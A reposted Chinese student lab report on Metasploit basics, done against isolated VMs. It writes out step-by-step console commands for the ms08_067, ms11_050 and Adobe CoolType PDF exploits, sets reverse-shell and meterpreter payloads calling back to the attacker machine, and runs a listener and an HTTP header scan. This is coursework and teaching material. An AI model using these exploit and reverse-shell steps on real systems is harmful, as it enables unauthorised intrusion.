2018-2019 20165208 網絡對抗 Exp5 MSF基礎


2018-2019 20165208 網絡對抗 Exp5 MSF基礎

實驗內容

本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成:

1.1一個主動攻擊實踐,如ms08_067; (1分)

1.2 一個針對瀏覽器的攻擊,如ms11_050;(1分)

1.3 一個針對客戶端的攻擊,如Adobe;(1分)

1.4 成功應用任何一個輔助模塊。(0.5分)

1.5 報告評分(1分)

基礎問題回答

用自己的話解釋什么是exploit,payload,encode.

  • exploit:指由攻擊者利用安全漏洞,將負責攻擊的代碼payload傳送到靶機中。
  • payload:是target在被滲透攻擊之后去執行的惡意代碼,如ex1的shellcode。
  • encode:進行編碼改變payload形態,使其不出現特定字符。

實踐過程記錄

1.一個主動攻擊實踐,如ms08_067;

 ①攻擊機:kali IP:192.168.119.128
 
②靶機:windows XP SP3(English) IP:192.168.119.129(失敗)

②靶機:windows 2000 Professional(English) IP:192.168.119.130(成功)
  • 在攻擊機kali輸入msfconsole進入控制台,依次輸入以下指令:

    • msf > use exploit/windows/smb/ms08_067_netapi//使用ms08_067漏洞,use后其實是漏洞所在目錄路徑名
    • msf exploit(ms08_067_netapi) > show payloads//顯示回連攻擊載荷
    • msf exploit(ms08_067_netapi) > set payload
    • generic/shell_reverse_tcp //tcp反向回連
    • msf exploit(ms08_067_netapi) > set LHOST 192.168.119.128 //攻擊機ip
    • msf exploit(ms08_067_netapi) > set LPORT 5208 //攻擊端口
    • msf exploit(ms08_067_netapi) > set RHOST 192.168.119.129 //靶機ip,特定漏洞端口已經固定
    • msf exploit(ms08_067_netapi) > set target 0 //自動選擇目標系統類型,匹配度較高
    • msf exploit(ms08_067_netapi) > exploit //攻擊
  • 建立會話,攻擊失敗顯示如下:

  • 通過網上查找資料,發現可能是打過補丁的原因,更換虛擬機。

  • 選擇靶機windows 2000 Professional(English)。

  • 按上述命令進行操作,記得更換IP。

  • 顯示監聽成功,dir命令成功。

2. 一個針對瀏覽器的攻擊,如ms11_050;

①攻擊機:kali IP:192.168.119.128

②靶機:windows 7 x64 IP:192.168.119.131 IE:8.0(失敗)

②靶機:windows Sever 2008  IP:192.168.119.132(成功)
  • 在攻擊機kali輸入msfconsole進入控制台,依次輸入以下指令:

    • msf > use windows/browser/ms11_050_mshtml_cobjectelement//使用瀏覽器ms11_050漏洞
    • msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回連
    • msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.119.128 //攻擊機ip
    • msf exploit(ms11_050_cobjectelement) > set LPORT 5208 //攻擊端口固定
    • msf exploit(ms11_050_cobjectelement) > set URIPATH 5208ky //統一資源標識符路徑設置
    • msf exploit(ms11_050_cobjectelement) > exploit
  • 運行靶機瀏覽器,這時win7出現DNS服務器未響應,嘗試解決無果后,更換了虛擬機。

  • 操作同上

  • 在訪問http://192.168.119.128:8080/5208ky時,可見攻擊機出現訪問信息。

3. 一個針對客戶端的攻擊,如Adobe;

①攻擊機:kali IP:192.168.119.128

②靶機:windows XP sp2 IP:192.168.119.133 

Adobe:9.3

  • 在攻擊機kali輸入msfconsole進入控制台,依次輸入以下指令:

    • `msf > use windows/fileformat/adobe_cooltype_sing
    • msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp` //tcp反向回連
    • msf exploit(adobe_cooltype_sing) > set LHOST 192.168.119.128 //攻擊機ip
    • msf exploit(adobe_cooltype_sing) > set LPORT 5208 //攻擊端口
    • msf exploit(adobe_cooltype_sing) > set FILENAME 20165208.pdf //設置生成pdf文件的名字
    • msf exploit(adobe_cooltype_sing) > exploit //攻擊
  • 成功生成20165208.pdf。

  • 將pdf文件傳送或拷貝到靶機上后,在kali上輸入back退出當前模塊,進入監聽模塊,輸入以下命令:

    • msf > use exploit/multi/handler //進入監聽模塊
    • msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向連接
    • msf exploit(handler) > set LHOST 192.168.119.128 //攻擊機ip
    • msf exploit(handler) > set LPORT 5208 //攻擊端口固定
    • msf exploit(handler) > exploit
  • 然后在靶機上打開20165208.pdf文件。

  • kali連接成功。

  • 攻擊機運行ipconfig命令,可顯示靶機IP地址。

  • 靶機關閉pdf文件,則失去權限。

4. 成功應用任何一個輔助模塊(scanner/http/http_header 唯一)

  • 使用命令msf > show auxiliary查看所有的輔助模塊

  • 在看的時候我試了幾個,因為好多命令的描述我不能准確的定位到它功能,最后我選擇了scanner/http/http_header

  • info scanner/http/http_header查看命令相關信息。

  • 我們可以看到它的描述: This module shows HTTP Headers returned by the scanned systems。我最初以為它是給我返回瀏覽器的頭部信息,也就是可以監聽對方訪問網頁瀏覽的是什么。

  • 實際操作:首先use scanner/http/http_header調用模塊,然后根據info得出的參數信息對參數進行設定

use scanner/http/http_header
set RHOSTS 192.168.119.132
RHOSTS => 192.168.119.132
set HTTP_METHOD GET
set RPORT 8080
exploit

set RPORT 80
exploit

  • 在端口80監聽時我們可以看到返回信息Microsoft-IIS/7.0
  • 可以得出結論:目標計算機80端口上運行着IIS 7.0,

而在歷年的IIS版本漏洞中,IIS 6.0、IIS 5.1、IIS 7.5和IIS 7.0受影響的漏洞數居前四位。同時我們可以大概根據IIS 7.0 判斷出它的操作系統版本為Win 200或Vista全系列 。這和我們的靶機系統也是匹配的。

IIS版本 系統版本 受影響漏洞數量
IIS 5.0 Windows 2000 10
IIS 5.1 Windows XP 系列 16
IIS 7.0 Win 2008、Vista全系列 11
IIS 10.0 Win 10和Win 2016 2

實驗中遇到的問題及解決方法

1.問題:在主動攻擊實踐時,操作完exploit后顯示 Exploit completed, but no session was created.

查了資料后我做了以下幾個修改嘗試:

我最初設的target參數是0,即自動選擇目標系統類型。在嘗試解決時我選了設為6。想說會不會這樣的匹配度更合適,失敗了。

后來找到過程中看到有說可能是系統打了補丁,使攻擊難以進行。所以就選擇更換了虛擬機。

2.問題:在進行針對瀏覽器的攻擊時,靶機顯示無法顯示該網頁。進行診斷后提示是DNS服務器未響應。

根據網絡診斷提示DNS服務器未響應,我進行了三種嘗試,分別如下:


不過,so sad,失敗了,最后選擇更換為win 2008虛擬機。

離實戰還缺些什么技術或步驟?

現在的操作限定條件較多,對靶機,對版本,對補丁都多有要求,而對於更接近現實的攻擊情況而言,自己的能力還有限,對於代碼編寫類的依賴已有教程的情況比較多,也就決定了攻擊可能已經被破解,從而達不到既定的要求。

實驗感想

本次實驗對MSF做了簡單的試操作,在找到合適的虛擬機后實驗還是相對清晰、簡單的。在這個過程中,學會查找很主要,infoshow targetsshow payloads等命令都幫了我不少忙。在整個實驗中第四個模塊是我獨立完成的,網絡上有關我選的這個命令的直接使用教程還是蠻少的,但是可以發現很多其他的例子。舉一反三,懷着未知的忐忑去嘗試成功后還是蠻有成就感的。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM